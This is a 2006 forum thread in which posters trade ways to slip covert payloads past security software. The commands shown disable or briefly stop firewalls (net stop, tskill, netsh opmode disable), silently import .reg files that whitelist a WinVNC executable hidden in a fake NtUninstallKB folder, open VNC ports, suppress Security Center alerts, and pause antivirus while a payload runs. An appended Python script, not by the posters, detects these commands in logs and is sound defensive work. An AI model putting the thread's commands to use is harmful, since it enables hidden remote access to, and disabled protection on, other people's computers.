Shiva Posted November 9, 2006
hi, wut if a host has a firewall up & running? because the fw will catch it, saying a program is trying to send mail. how does 1 overcome this kinda scenario?? thx in adv
remkow Posted November 9, 2006
You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"
Shiva (Author) Posted November 10, 2006
erm ... for Net Stop to work u hafta know the other pc's Username & pwd and u hafta do it from an account that belongs to the Administrator's grp. Also, if ya kill the FW, especially on boxes with SP2 installed, da Security Centre's msgs will kick in n start displaying not loaded or some such msg. It may also start Windows own "firewall" if it can b considered a fw at all - lol. Any other thoughts on this? thx in adv
remkow Posted November 10, 2006
It's quite easy to disable the security center popups in the registry, and you can also add rules to the windows firewall through the registry.
pseudobreed Posted November 10, 2006
> erm ... for Net Stop to work u hafta know the other pc's Username & pwd and u hafta do it from an account that belongs to the Administrator's grp.
The payload is executed by a local admin account. You don't have to have a username and password, it will use the default profile credentials. Just add "net stop service" at the top of your payload, and then you can "net start service" at the end to put the firewall back to normal. The only issue is if the firewall has a task tray icon (And I don't know many that don't). Once you stop the service, the icon changes to show the status of the firewall.
remkow Posted November 10, 2006
It's only gonna be for a few secs, if you'd start it again at the end of the file, so it doesn't really matter
Catcheral Posted November 10, 2006
> You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"
Do you know the service name for the windows firewall?
remkow Posted November 10, 2006
You don't have to disable the windows firewall, just add some registry entries and ur set. When using the WinVNC payload, you only have to add this registry file:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "%systemroot%\\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\\WinVNC.exe"="%systemroot%\\$NtUninstallKB21050c07160c070f0b0a0a05031b05$\\WinVNC.exe:*:Enabled:WinVnc"
    "%appdata%\\NtUninstallKB21050c07160c070f0b0a0a05031b05\\WinVNC.exe"="%appdata%\\NtUninstallK21050c07160c070f0b0a0a05031b05\\WinVNC.exe:*:Enabled:WinVnc"
Just save it as vnc.reg, and in your go.cmd import it using "reg import vnc.reg" or "regedit /s vnc.reg".
Catcheral Posted November 10, 2006
What I want to do is just to disable the firewall for a short space of time, not using the switchblade or hacksaw. But I'm doing something else that is blocked by the firewall, and the message is: 'For your protection windows firewall has blocked this operation' or something along those lines. And I want to know if there is a way to turn it off, do what I want to do, and turn it back on again, by using a batch file etc.
remkow Posted November 10, 2006
I'm not using Windows Firewall myself, but I think that this should disable it:
    netsh firewall set opmode disable
And to prevent the security center from popping up use this registry file:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
    "FirewallDisableNotify"=dword:00000001
Shiva (Author) Posted November 11, 2006
> I'm not using Windows Firewall myself, but I think that this should disable it:
>     netsh firewall set opmode disable
kewl thx :D
> And to prevent the security center from popping up use this registry file:
>     Windows Registry Editor Version 5.00
>     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
>     "FirewallDisableNotify"=dword:00000001
thx again :D
Shiva (Author) Posted November 11, 2006
> You can just disable the firewall processes with tskill. If you know the exact service name of the firewall, you can stop it by using net stop [name]. For instance, I can kill my Sygate firewall by using "net stop smcservice"
> Do you know the service name for the windows firewall?
Just as a side note, if you know the admin pwd of a remote box which has remote registry enabled (i think it's enabled by default) then u can use PSList from http://www.SysInternals.com to get a list of services running on dat box n snipe em one by 1.
Spartain X Posted November 11, 2006
i really think you are better off using the netsh command than using premade registry entries, because of the chances that the comp does not successfully apply the reg key, it could get screwed up and the box is FUBAR. also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall processes / services and launches the payload and then calls a batch that resumes or starts the processes / services
Catcheral Posted November 12, 2006
> I'm not using Windows Firewall myself, but I think that this should disable it:
>     netsh firewall set opmode disable
> And to prevent the security center from popping up use this registry file:
>     Windows Registry Editor Version 5.00
>     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
>     "FirewallDisableNotify"=dword:00000001
that worked. Cheers =]
remkow Posted November 12, 2006
> that worked. Cheers =]
No problem m8
> i really think you are better off using the netsh command than using premade registry entries, because of the chances that the comp does not successfully apply the reg key, it could get screwed up and the box is FUBAR. also for the problem with firewalls i have just made a quick batch that pauses or suspends AV's, Spyware and firewall processes / services and launches the payload and then calls a batch that resumes or starts the processes / services
Can you post it?? I'm making one too, but I don't have a lot of different av/fws to test it with.
Spartain X Posted November 13, 2006
if you follow a similar syntax you should be able to add any port you like
    netsh firewall add portopening TCP 5900 SMBv1
    netsh firewall add portopening TCP 5800 SMBv2
    netsh firewall add portopening UDP 5900 RDPv1
    netsh firewall add portopening UDP 5800 RDPv2
it's basically "netsh firewall add portopening" and then the protocol then port then the comment. btw this is an example of how to apply it to vnc, btw tvnc does not use udp but i included it as an example
majk Posted November 13, 2006
> if you follow a similar syntax you should be able to add any port you like
>     netsh firewall add portopening TCP 5900 SMBv1
>     netsh firewall add portopening TCP 5800 SMBv2
>     netsh firewall add portopening UDP 5900 RDPv1
>     netsh firewall add portopening UDP 5800 RDPv2
> it's basically "netsh firewall add portopening" and then the protocol then port then the comment. btw this is an example of how to apply it to vnc, btw tvnc does not use udp but i included it as an example
But doesn't that only work with Windows built in firewall?
Spartain X Posted November 14, 2006
yes that's only for windows firewall, for others you will have to use the registry and even then the AV might intercept it as a virus or trojan trying to tamper with its firewall
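
The commands named in this thread (net stop, tskill, netsh firewall set opmode disable, netsh firewall add portopening, silent .reg imports) all show up in process-creation logs. The following added example, not written by any poster in the thread, matches them in Python and also flags a service that is stopped and restarted shortly afterwards; the event tuples, rule names and 60-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (timestamp, command line); not real logs.
SAMPLE_EVENTS = [
    ("2006-11-10 14:02:01", "cmd.exe /c go.cmd"),
    ("2006-11-10 14:02:02", "net stop smcservice"),
    ("2006-11-10 14:02:03", "regedit /s vnc.reg"),
    ("2006-11-10 14:02:04", "netsh firewall add portopening TCP 5900 SMBv1"),
    ("2006-11-10 14:02:09", "net start smcservice"),
    ("2006-11-10 15:30:00", "netsh firewall show state"),
    ("2006-11-10 16:00:00", "netsh firewall set opmode disable"),
]

# Command-line patterns for the tampering methods named in the thread.
RULES = [
    ("service_stop", re.compile(r"^net1?(\.exe)?\s+stop\s+(?P<svc>\S+)", re.I)),
    ("process_kill", re.compile(r"^tskill(\.exe)?\s+\S+", re.I)),
    ("fw_disabled", re.compile(r"^netsh(\.exe)?\s+firewall\s+set\s+opmode\s+disable", re.I)),
    ("fw_port_opened", re.compile(r"^netsh(\.exe)?\s+firewall\s+add\s+portopening\s+(TCP|UDP)\s+\d+", re.I)),
    ("silent_reg_import", re.compile(r"^(reg(\.exe)?\s+import|regedit(\.exe)?\s+/s)\s+\S+", re.I)),
]
START = re.compile(r"^net1?(\.exe)?\s+start\s+(?P<svc>\S+)", re.I)

def detect(events, window=timedelta(seconds=60)):
    """Return (timestamp, rule, command) findings, plus a 'transient_stop'
    finding when a stopped service is restarted within `window`."""
    findings, stopped = [], {}
    for ts_text, cmd in events:
        ts = datetime.strptime(ts_text, "%Y-%m-%d %H:%M:%S")
        cmd = cmd.strip()
        for name, pattern in RULES:
            m = pattern.search(cmd)
            if m:
                findings.append((ts_text, name, cmd))
                if name == "service_stop":
                    stopped[m.group("svc").lower()] = ts
        m = START.search(cmd)
        if m:
            began = stopped.pop(m.group("svc").lower(), None)
            if began is not None and ts - began <= window:
                findings.append((ts_text, "transient_stop", cmd))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

The stop-then-start correlation matters because a brief outage leaves the service running again by the time anyone looks at its state, so only the event history shows it.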